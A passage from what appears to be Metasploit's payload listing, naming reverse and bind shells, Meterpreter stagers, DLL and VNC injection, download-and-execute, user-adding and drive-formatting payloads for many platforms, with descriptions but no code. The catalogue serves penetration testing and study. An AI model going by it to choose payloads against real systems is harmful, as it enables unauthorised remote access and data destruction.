Shell, Reverse TCP Stager - linux/mipsle/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/mipsle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/ppc/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/ppc/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/ppc/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/ppc/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/ppc/shell_find_port normal No Linux Command Shell, Find Port Inline - linux/ppc/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/ppc64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/ppc64/shell_find_port normal No Linux Command Shell, Find Port Inline - linux/ppc64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/ppc64le/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/ppc64le/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/ppc64le/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/ppce500v2/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/ppce500v2/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/ppce500v2/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/x64/exec normal No Linux Execute Command - linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager - linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager - linux/x64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/x64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/x64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/x64/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager - linux/x64/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager - linux/x64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/x64/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline - linux/x64/shell_find_port normal No Linux Command Shell, Find Port Inline - linux/x64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/x86/adduser normal No Linux Add User - linux/x86/chmod normal No Linux Chmod - linux/x86/exec normal No Linux Execute Command - linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86) - linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86) - linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager - linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86) - linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86) - linux/x86/meterpreter/find_tag normal No Linux Mettle x86, Find Tag Stager - linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6) - linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager - linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager - linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager - linux/x86/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/x86/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/x86/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP - linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline - linux/x86/read_file normal No Linux Read File - linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86) - linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86) - linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager - linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86) - linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86) - linux/x86/shell/find_tag normal No Linux Command Shell, Find Tag Stager - linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6) - linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager - linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager - linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager - linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6) - linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline - linux/x86/shell_find_port normal No Linux Command Shell, Find Port Inline - linux/x86/shell_find_tag normal No Linux Command Shell, Find Tag Inline - linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6) - linux/zarch/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/zarch/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/zarch/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - mainframe/shell_reverse_tcp normal No Z/OS (MVS) Command Shell, Reverse TCP Inline - multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures) - multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures) - netware/shell/reverse_tcp normal No NetWare Command Shell, Reverse TCP Stager - nodejs/shell_bind_tcp normal No Command Shell, Bind TCP (via nodejs) - nodejs/shell_reverse_tcp normal No Command Shell, Reverse TCP (via nodejs) - nodejs/shell_reverse_tcp_ssl normal No Command Shell, Reverse TCP SSL (via nodejs) - osx/armle/execute/bind_tcp normal No OS X Write and Execute Binary, Bind TCP Stager - osx/armle/execute/reverse_tcp normal No OS X Write and Execute Binary, Reverse TCP Stager - osx/armle/shell/bind_tcp normal No OS X Command Shell, Bind TCP Stager - osx/armle/shell/reverse_tcp normal No OS X Command Shell, Reverse TCP Stager - osx/armle/shell_bind_tcp normal No Apple iOS Command Shell, Bind TCP Inline - osx/armle/shell_reverse_tcp normal No Apple iOS Command Shell, Reverse TCP Inline - osx/armle/vibrate normal No Apple iOS iPhone Vibrate - osx/ppc/shell/bind_tcp normal No OS X Command Shell, Bind TCP Stager - osx/ppc/shell/find_tag normal No OS X Command Shell, Find Tag Stager - osx/ppc/shell/reverse_tcp normal No OS X Command Shell, Reverse TCP Stager - osx/ppc/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline - osx/ppc/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline - osx/x64/dupandexecve/bind_tcp normal No OS X dup2 Command Shell, Bind TCP Stager - osx/x64/dupandexecve/reverse_tcp normal No OS X dup2 Command Shell, Reverse TCP Stager - osx/x64/exec normal No OS X x64 Execute Command - osx/x64/meterpreter/bind_tcp normal No OSX Meterpreter, Bind TCP Stager - osx/x64/meterpreter/reverse_tcp normal No OSX Meterpreter, Reverse TCP Stager - osx/x64/meterpreter_reverse_http normal No OSX Meterpreter, Reverse HTTP Inline - osx/x64/meterpreter_reverse_https normal No OSX Meterpreter, Reverse HTTPS Inline - osx/x64/meterpreter_reverse_tcp normal No OSX Meterpreter, Reverse TCP Inline - osx/x64/say normal No OS X x64 say Shellcode - osx/x64/shell_bind_tcp normal No OS X x64 Shell Bind TCP - osx/x64/shell_find_tag normal No OSX Command Shell, Find Tag Inline - osx/x64/shell_reverse_tcp normal No OS X x64 Shell Reverse TCP - osx/x86/bundleinject/bind_tcp normal No Mac OS X Inject Mach-O Bundle, Bind TCP Stager - osx/x86/bundleinject/reverse_tcp normal No Mac OS X Inject Mach-O Bundle, Reverse TCP Stager - osx/x86/exec normal No OS X Execute Command - osx/x86/isight/bind_tcp normal No Mac OS X x86 iSight Photo Capture, Bind TCP Stager - osx/x86/isight/reverse_tcp normal No Mac OS X x86 iSight Photo Capture, Reverse TCP Stager - osx/x86/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline - osx/x86/shell_find_port normal No OS X Command Shell, Find Port Inline - osx/x86/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline - osx/x86/vforkshell/bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Stager - osx/x86/vforkshell/reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Stager - osx/x86/vforkshell_bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Inline - osx/x86/vforkshell_reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Inline - php/bind_perl normal No PHP Command Shell, Bind TCP (via Perl) - php/bind_perl_ipv6 normal No PHP Command Shell, Bind TCP (via perl) IPv6 - php/bind_php normal No PHP Command Shell, Bind TCP (via PHP) - php/bind_php_ipv6 normal No PHP Command Shell, Bind TCP (via php) IPv6 - php/download_exec normal No PHP Executable Download and Execute - php/exec normal No PHP Execute Command - php/meterpreter/bind_tcp normal No PHP Meterpreter, Bind TCP Stager - php/meterpreter/bind_tcp_ipv6 normal No PHP Meterpreter, Bind TCP Stager IPv6 - php/meterpreter/bind_tcp_ipv6_uuid normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support - php/meterpreter/bind_tcp_uuid normal No PHP Meterpreter, Bind TCP Stager with UUID Support - php/meterpreter/reverse_tcp normal No PHP Meterpreter, PHP Reverse TCP Stager - php/meterpreter/reverse_tcp_uuid normal No PHP Meterpreter, PHP Reverse TCP Stager - php/meterpreter_reverse_tcp normal No PHP Meterpreter, Reverse TCP Inline - php/reverse_perl normal No PHP Command, Double Reverse TCP Connection (via Perl) - php/reverse_php normal No PHP Command Shell, Reverse TCP (via PHP) - php/shell_findsock normal No PHP Command Shell, Find Sock - python/meterpreter/bind_tcp normal No Python Meterpreter, Python Bind TCP Stager - python/meterpreter/bind_tcp_uuid normal No Python Meterpreter, Python Bind TCP Stager with UUID Support - python/meterpreter/reverse_http normal No Python Meterpreter, Python Reverse HTTP Stager - python/meterpreter/reverse_https normal No Python Meterpreter, Python Reverse HTTPS Stager - python/meterpreter/reverse_tcp normal No Python Meterpreter, Python Reverse TCP Stager - python/meterpreter/reverse_tcp_ssl normal No Python Meterpreter, Python Reverse TCP SSL Stager - python/meterpreter/reverse_tcp_uuid normal No Python Meterpreter, Python Reverse TCP Stager with UUID Support - python/meterpreter_bind_tcp normal No Python Meterpreter Shell, Bind TCP Inline - python/meterpreter_reverse_http normal No Python Meterpreter Shell, Reverse HTTP Inline - python/meterpreter_reverse_https normal No Python Meterpreter Shell, Reverse HTTPS Inline - python/meterpreter_reverse_tcp normal No Python Meterpreter Shell, Reverse TCP Inline - python/shell_bind_tcp normal No Command Shell, Bind TCP (via python) - python/shell_reverse_tcp normal No Command Shell, Reverse TCP (via python) - python/shell_reverse_tcp_ssl normal No Command Shell, Reverse TCP SSL (via python) - python/shell_reverse_udp normal No Command Shell, Reverse UDP (via python) - r/shell_bind_tcp normal No R Command Shell, Bind TCP - r/shell_reverse_tcp normal No R Command Shell, Reverse TCP - ruby/shell_bind_tcp normal No Ruby Command Shell, Bind TCP - ruby/shell_bind_tcp_ipv6 normal No Ruby Command Shell, Bind TCP IPv6 - ruby/shell_reverse_tcp normal No Ruby Command Shell, Reverse TCP - ruby/shell_reverse_tcp_ssl normal No Ruby Command Shell, Reverse TCP SSL - solaris/sparc/shell_bind_tcp normal No Solaris Command Shell, Bind TCP Inline - solaris/sparc/shell_find_port normal No Solaris Command Shell, Find Port Inline - solaris/sparc/shell_reverse_tcp normal No Solaris Command Shell, Reverse TCP Inline - solaris/x86/shell_bind_tcp normal No Solaris Command Shell, Bind TCP Inline - solaris/x86/shell_find_port normal No Solaris Command Shell, Find Port Inline - solaris/x86/shell_reverse_tcp normal No Solaris Command Shell, Reverse TCP Inline - tty/unix/interact normal No Unix TTY, Interact with Established Connection - windows/adduser normal No Windows Execute net user /ADD - windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager - windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager - windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86) - windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager - windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7) - windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86) - windows/dllinject/bind_tcp_rc4 normal No Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86) - windows/dllinject/find_tag normal No Reflective DLL Injection, Find Tag Ordinal Stager - windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager - windows/dllinject/reverse_http normal No Reflective DLL Injection, Windows Reverse HTTP Stager (wininet) - windows/dllinject/reverse_http_proxy_pstore normal No Reflective DLL Injection, Reverse HTTP Stager Proxy - windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6) - windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7) - windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7) - windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager - windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager - windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS) - windows/dllinject/reverse_tcp_rc4 normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/dllinject/reverse_tcp_rc4_dns normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support - windows/dllinject/reverse_udp normal No Reflective DLL Injection, Reverse UDP Stager with UUID Support - windows/dllinject/reverse_winhttp normal No Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp) - windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution - windows/download_exec normal No Windows Executable Download (http,https,ftp) and Execute - windows/exec normal No Windows Execute Command - windows/format_all_drives manual No Windows Drive Formatter - windows/loadlibrary normal No Windows LoadLibrary Path - windows/messagebox normal No Windows MessageBox - windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager - windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager - windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) - windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager - windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7) - windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86) - windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) - windows/meterpreter/find_tag normal No Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager - windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager - windows/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet) - windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy - windows/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet) - windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy - windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6) - windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager - windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7) - windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) - windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager - windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager - windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS) - windows/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/meterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support - windows/meterpreter/reverse_udp normal No Windows Meterpreter (Reflective Injection), Reverse UDP Stager with UUID Support - windows/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp) - windows/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp) - windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline - windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline - windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline - windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline - windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) - windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline - windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP - windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline - windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager - windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager - windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86) - windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager - windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7) - windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86) - windows/patchupdllinject/bind_tcp_rc4 normal No Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86) - windows/patchupdllinject/find_tag normal No Windows Inject DLL, Find Tag Ordinal Stager - windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6) - windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7) - windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7) - windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager - windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager - windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS) - windows/patchupdllinject/reverse_tcp_rc4 normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/patchupdllinject/reverse_tcp_rc4_dns normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support - windows/patchupdllinject/reverse_udp normal No Windows Inject DLL, Reverse UDP Stager with UUID Support - windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager - windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager - windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86) - windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager - windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7) - windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86) - windows/patchupmeterpreter/bind_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86) - windows/patchupmeterpreter/find_tag normal No Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager - windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6) - windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7) - windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7) - windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager - windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager - windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS) - windows/patchupmeterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/patchupmeterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support - windows/patchupmeterpreter/reverse_udp normal No Windows Meterpreter (skape/jt Injection), Reverse UDP Stager with UUID Support - windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP - windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP - windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager - windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager - windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86) - windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 Bind Named Pipe Stager - windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7) - windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86) - windows/shell/bind_tcp_rc4 normal No Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86) - windows/shell/find_tag normal No Windows Command Shell, Find Tag Ordinal Stager - windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6) - windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7) - windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7) - windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager - windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager - windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS) - windows/shell/reverse_tcp_rc4 normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/shell/reverse_tcp_rc4_dns normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support - windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support - windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline - windows/shell_bind_tcp_xpfw normal No Windows Disable Windows ICF, Command Shell, Bind TCP Inline - windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline - windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline - windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!" - windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager - windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager - windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86) - windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager - windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7) - windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86) - windows/upexec/bind_tcp_rc4 normal No Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86) - windows/upexec/find_tag normal No Windows Upload/Execute, Find Tag Ordinal Stager - windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6) - windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7) - windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7) - windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager - windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager - windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS) - windows/upexec/reverse_tcp_rc4 normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/upexec/reverse_tcp_rc4_dns normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support - windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support - windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager - windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager - windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) - windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager - windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7) - windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86) - windows/vncinject/bind_tcp_rc4 normal No VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) - windows/vncinject/find_tag normal No VNC Server (Reflective Injection), Find Tag Ordinal Stager - windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager - windows/vncinject/reverse_http normal No VNC 